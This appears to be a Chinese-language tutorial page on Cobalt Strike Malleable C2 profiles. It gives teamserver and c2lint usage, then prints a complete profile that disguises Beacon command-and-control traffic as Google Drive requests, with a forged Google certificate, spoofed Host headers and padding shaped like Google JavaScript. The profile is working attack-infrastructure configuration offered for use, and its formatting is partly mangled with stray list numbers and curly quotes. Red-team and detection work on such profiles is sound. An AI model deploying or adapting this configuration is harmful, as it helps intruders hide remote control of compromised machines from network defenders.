Malleable-C2-Profiles

profile文件介绍
Beacon的HTTP的indicators由Malleable-C2-profile文件控制,关于Malleable-C2-profile,它是一个简单的配置文件,用来指定如何转换数据并将其存储在transaction中,转换和存储数据的相同配置文件也从transaction中提取和恢复。
使用方法:./teamserver [external IP] [password] [/path/to/my.profile]
对于profile文件可以通过cobalt strike软件包中的c2lint文件进行检查,建议第一次使用的profile文件都检查一遍。
检查方法:./c2lint [/path/to/my.profile]
PS

  • 每次修改data.profile文件后,都要重启teamserver和listeners。。。不然要出问题

    data.profile

    ```

    Make requests look like OneDrive web requests

    #

    Author: @ChrisTruncer

set https cert info

https-certificate { set CN “*.google.com”; #Common Name set O “Google Inc”; #Organization Name set C “US”; #Country set L “Mountain View”; #Locality set ST “California”; #State or Province set validity “365”; #Number of days the cert is valid for }

set useragent “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko”; set sleeptime “30000”; set pipename “mojo.5688.8052.183894939787088877##”; set jitter “15”; set dns_idle “8.8.4.4”; set dns_sleep “0”; set maxdns “235”;

http-get { set uri “/scs/drive-static/js/3.14/“; client {

  1.     metadata {
  2.         base64;
  3.         prepend "OSID=";
  4.         header "Cookie";
  5.     }
  7.     header "Host" "drive.google.com";
  8.     header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
  9.     header "Accept-Language" "en-US;q=0.3,en;q=0.2";
  10.     header "Accept-Encoding" "gzip, deflate";
  11.     header "DNT" "1";
  12. }
  14. server {
  15.     header "X-Content-Type-Options" "nosniff";
  16.     header "X-Frame-Options" "SAMEORIGIN";
  17.     header "Cache-Control" "public, max-age=31536000";
  18.     header "X-XSS-Protection" "1; mode=block";
  19.     header "Server" "GSE";
  20.     header "Alternate-Protocol" "443:quic,p=1";
  22.     output{
  23.         prepend "try(";
  24.         prepend "O(L.Oa(),\"sy580\")";
  25.         prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");";
  26.         prepend ")catch(e)(_DumpException(e))";
  27.         prepend "try(";
  28.         prepend "O(L.Oa(),\"sy558\");";
  29.         prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");";
  30.         prepend ")catch(e)(_DumpException(e))";
  31.         prepend "try(";
  33.         append "var f2=function(a)(a=a.wa;return\"application/chromium-bookmark-folder\"==a||\"application/chromium-root-folder\"==a||\"application/vnd.google-apps.folder\"==a||\"application/vnd.google-apps.photoalbum\"==a||\"application/vnd.google-apps.rollupphotoalbum\"==a)";
  34.         append ",g2=function(a)(return a.ra),s8d=function(a)(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)(case \"all\":case \"docs-images\":case \"docs-images-and-videos\":case \"docs-videos\":case \"documents\":case \"drawings\":case \"folders\":case \"forms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadsheets\":case \"tables\":return!0)return!1); O(L.Oa(),\"ak477\")";
  36.         print;
  38.     }
  39. }

}

http-post { set uri “/drive/ui/1/“; client { parameter “ui” “s3212f5452”; parameter “hop” “3620521”; parameter “start” “0”; header “Content-Type” “application/x-www-form-urlencoded;charset=utf-8”;

  1.     id {
  2.         base64;
  3.         prepend "OSID=";
  4.         header "Cookie";
  5.     }
  7.     output{
  8.         base64;
  9.         print;
  10.     }
  11. }
  13. server {
  14.     header "X-Content-Type-Options" "nosniff";
  15.     header "X-Frame-Options" "SAMEORIGIN";
  16.     header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
  17.     header "X-XSS-Protection" "1; mode=block";
  18.     header "Server" "GSE";
  20.     output {
  22.         prepend "[[[\"apm\",\"";
  24.         append "\"]";
  25.         append ",[\"ci\",[]";
  26.         append "]";
  27.         append ",[\"cm\",[]";
  28.         append ",[]";
  29.         append "]";
  30.         append "],'dkkasdh56sa0d45e1f']";
  32.         print;
  33.     }
  35. }

}

```

profile仓库